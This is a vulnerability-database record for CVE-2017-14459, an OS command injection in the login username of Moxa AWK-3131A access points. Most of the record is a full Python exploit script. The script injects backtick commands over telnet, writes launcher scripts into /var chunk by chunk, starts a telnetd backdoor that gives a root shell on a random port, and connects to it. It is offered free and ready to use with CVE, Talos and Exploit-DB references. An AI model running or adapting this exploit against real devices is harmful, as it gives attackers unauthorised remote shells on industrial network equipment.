ID
VAR-E-201704-0230
CVE
| cve_id: | CVE-2017-14459 | Trust: 1.0 |
EDB ID
44398
TITLE
Moxa AWK-3131A 1.4 < 1.7 - 'Username' OS Command Injection - Hardware remote Exploit
Trust: 0.6
DESCRIPTION
Moxa AWK-3131A 1.4 < 1.7 - 'Username' OS Command Injection. CVE-2017-14459 . remote exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | moxa | model: | awk-3131a | scope: | eq | version: | 1.4<1.7 | Trust: 1.6 |
EXPLOIT
#!/usr/bin/env python2
import telnetlib
import re
import random
import string
# Split string into chunks, of which each is <= length
def chunkstring(s, length):
return (s[0+i:length+i] for i in range(0, len(s), length))
# Split strings based on MAX_LEN. Encode any newlines and/or spaces.
def split_script(script):
MAX_LEN = 28 - len('printf${IFS}"">>/var/a') - 1
completed = []
temp = re.split('(\n)', script)
for content in temp:
if len(content) != 0:
for s in re.split('( )', content):
if ' ' in s:
s = '\\x20'
if '\n' in s:
s = ['\\n']
else:
s = list(chunkstring(s, MAX_LEN))
completed.append(s)
return [item for sublist in completed for item in sublist] # Flatten nested list items
# Execute each command via the username parameter
def do_cmd(host, command):
tn = telnetlib.Telnet(host)
modCommand = command.replace(' ', '${IFS}') # Spaces aren't allowed, replace with ${IFS}
tn.read_until("login: ")
tn.write("`%s`\n" % modCommand)
print "Sent command: %s\n modified: %s\n size: %d" % (command, modCommand, len(modCommand))
tn.read_until("Password: ")
tn.write(" " + "\n")
tn.read_until("incorrect")
tn.close()
# Write script to writable directory on host
def write_script(host, script, t_dir, t_name):
print "[*] Writing shell script to host..."
i = 0
for token in split_script(script):
carat = '>' if i == 0 else '>>'
do_cmd(host, 'printf "%s"%s%s/%s' % (token, carat, t_dir, t_name))
i+=1
do_cmd(host, 'chmod +x %s/%s' % (t_dir,t_name))
print "[*] Script written to: %s/%s\n" % (t_dir,t_name)
# Attempt to connect to newly-created backdoor
def backdoor_connect(host,port):
print "[*] Attempting to connect to backdoor @ %s:%d" % (host, port)
tn = telnetlib.Telnet(host, port)
tn.interact()
def main():
host = "192.168.127.253"
port = random.randint(2048,4096)
w_dir = '/var' # writable directory
s_name = random.choice(string.ascii_uppercase) # /bin/sh launcher
t_name = s_name.lower() # telnetd launcher
# Need a shell launcher script to launch /bin/sh because
# telnetd adds a '-h' option to the login command
shell_launcher = "#!/bin/sh\nexec sh"
# Launch telnetd with the launcher script as the login
# command to execute
telnetd_launcher = "#!/bin/sh\ntelnetd -p%d -l%s/%s" % (port, w_dir,s_name)
write_script(host, shell_launcher, w_dir, s_name)
write_script(host, telnetd_launcher, w_dir, t_name)
# Execute telnetd script and attempt to connect
do_cmd(host, '.%s/%s' % (w_dir,t_name))
backdoor_connect(host, port)
if __name__ == "__main__":
main()
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'Username' OS Command Injection
Trust: 1.6
CREDITS
Talos
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 44398 | Trust: 1.6 |
| db: | NVD | id: | CVE-2017-14459 | Trust: 1.0 |
| db: | TALOS | id: | TALOS-2017-0507 | Trust: 1.0 |
| db: | EDBNET | id: | 97371 | Trust: 0.6 |
REFERENCES
| url: | https://talosintelligence.com/vulnerability_reports/talos-2017-0507 | Trust: 1.0 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2017-14459 | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/44398/ | Trust: 0.6 |
SOURCES
| db: | EXPLOIT-DB | id: | 44398 |
| db: | EDBNET | id: | 97371 |
LAST UPDATE DATE
2022-07-27T09:44:46.987000+00:00
SOURCES RELEASE DATE
| db: | EXPLOIT-DB | id: | 44398 | date: | 2017-04-03T00:00:00 |
| db: | EDBNET | id: | 97371 | date: | 2018-04-04T00:00:00 |